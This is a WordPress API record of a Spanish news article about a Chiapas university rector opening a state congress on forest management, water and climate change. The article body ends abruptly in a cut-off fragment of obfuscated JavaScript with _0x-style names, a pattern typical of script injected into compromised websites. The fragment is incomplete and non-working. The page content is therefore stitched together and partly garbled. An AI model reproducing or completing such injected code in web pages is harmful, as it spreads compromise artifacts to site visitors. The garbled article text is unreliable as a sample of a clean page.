{"id":15262,"date":"2024-04-23T01:02:11","date_gmt":"2024-04-23T01:02:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15262"},"modified":"2024-04-23T01:02:12","modified_gmt":"2024-04-23T01:02:12","slug":"el-tema-del-medio-ambiente-cambio-climatico-es-tarea-de-todos-rector-de-la-unich","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15262","title":{"rendered":"El tema del medio ambiente, cambio clim\u00e1tico es tarea de todos: Rector de la UNICH"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"580\" data-id=\"15264\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4-1024x580.jpeg\" alt=\"\" class=\"wp-image-15264\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4-1024x580.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4-300x170.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4-768x435.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4-1536x870.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.11-PM-4.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15265\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-15265\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/WhatsApp-Image-2024-04-22-at-4.46.10-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de abril del 2024. San Crist\u00f3bal de Las Casas.- En el Marco del D\u00eda Mundial de la Madre Tierra, el rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, inaugur\u00f3 la 7\u00aa Sesi\u00f3n del Congreso Estatal \u201cEl Manejo Forestal y Desarrollo Rural ante el cambio clim\u00e1tico\u201d, el cual tiene como tem\u00e1tica central \u201cLos bosques y el agua fortaleza de Chiapas: propuestas para un mejor futuro\u201d, restauraci\u00f3n de los ecosistemas forestales y manejo integral del territorio de la Cuencas del R\u00edo Grijalva: Propuesta como pol\u00edtica de estado, que concluir\u00e1 este martes 23 de abril.<\/p>\n\n\n\n<p>\u201cEl tema de la madre naturaleza, el tema del medio ambiente, el cambio clim\u00e1tico, es tarea de todos, es un compromiso de todos, es papel fundamental que desde el sector educativo y desde nuestros estudiantes y docentes sigamos impulsando acciones a favor de la naturaleza. M\u00e1s haya que hablar de los derechos ind\u00edgenas, hay una defensa del h\u00e1bitat de las comunidades y de la humanidad, que es la madre tierra, estamos comprometidos como instituci\u00f3n de educaci\u00f3n superior de hacer alianzas entre alumnos, docentes y administrativos, y colaborar con nuestro ambiente\u201d, dijo.<\/p>\n\n\n\n<p>Durante el acto protocolario de inauguraci\u00f3n, agradeci\u00f3 la presencia de especialistas en el tema, para compartir experiencias en beneficio de la sociedad, ya que las comunidades ind\u00edgenas han tenido trayectoria y una forma diferente de relacionar al hombre y la madre naturaleza, y es importante relacionarlos con los avances tecnol\u00f3gicos, \u201cson conocimientos milenarios, esta vida c\u00edclica, que todos formamos parte de la madre naturaleza, de la madre tierra\u201d.<\/p>\n\n\n\n<p>\u201cCelebro que este congreso sea para generar propuestas, iniciativas que puedan convertirse en pol\u00edticas p\u00fablicas, que la participaci\u00f3n de la ciudadan\u00eda, de las organizaciones, de los l\u00edderes, de proyectos ejemplares alternativas, la construcci\u00f3n de un proyecto pol\u00edtico debe ser participativo, la gente que lo trabaja, que sabe, que ha vivido con ella y lo conoce, deben ser actores principales para incidir en las pol\u00edticas p\u00fablicas, en la creaci\u00f3n de nuevos posicionamientos pol\u00edticos de una manera participativa\u201d, indic\u00f3.<\/p>\n\n\n\n<p>Toledo Hern\u00e1ndez detall\u00f3 que el objetivo General, es posicionar y gestionar el manejo forestal comunitario e integral del territorio como pol\u00edtica p\u00fablica para el campo en Chiapas, partiendo de las microcuencas hidrol\u00f3gicas como unidades de planeaci\u00f3n, gesti\u00f3n, operaci\u00f3n y gobernanza, considerado en todo momento el respeto irrestricto al estado de derecho, la seguridad jur\u00eddica, el reordenamiento y la regularizaci\u00f3n en la tenencia de la tierra.<\/p>\n\n\n\n<p>El objetivo de esta 7\u00aa sesi\u00f3n, busca promover y gestionar, por su importancia estrat\u00e9gica para Chiapas y de inter\u00e9s nacional, la restauraci\u00f3n de los ecosistemas forestales, los agro ecosistemas y el manejo integral del territorio a partir de microcuencas (UMIT), en la cuenca del R\u00edo Grijalva como una Pol\u00edtica de Estado, en especial en las regiones Selva Zoque (Cintalapa) y Cuxtepeques (La Concordia); as\u00ed como un programa especial para las Ca\u00f1adas (Ocosingo), contribuyendo con ello a la mitigaci\u00f3n y adaptaci\u00f3n a los efectos del cambio clim\u00e1tico, la gobernanza, la paz, el bienestar social, y el desarrollo regional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de abril del 2024. San Crist\u00f3bal de Las Casas.- En el Marco del D\u00eda Mundial de la Madre Tierra, el rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, inaugur\u00f3 la 7\u00aa Sesi\u00f3n del Congreso Estatal \u201cEl Manejo Forestal y Desarrollo Rural ante el cambio clim\u00e1tico\u201d, el cual tiene &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15264,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15262","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15262","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15262"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15262\/revisions"}],"predecessor-version":[{"id":15266,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15262\/revisions\/15266"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15264"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}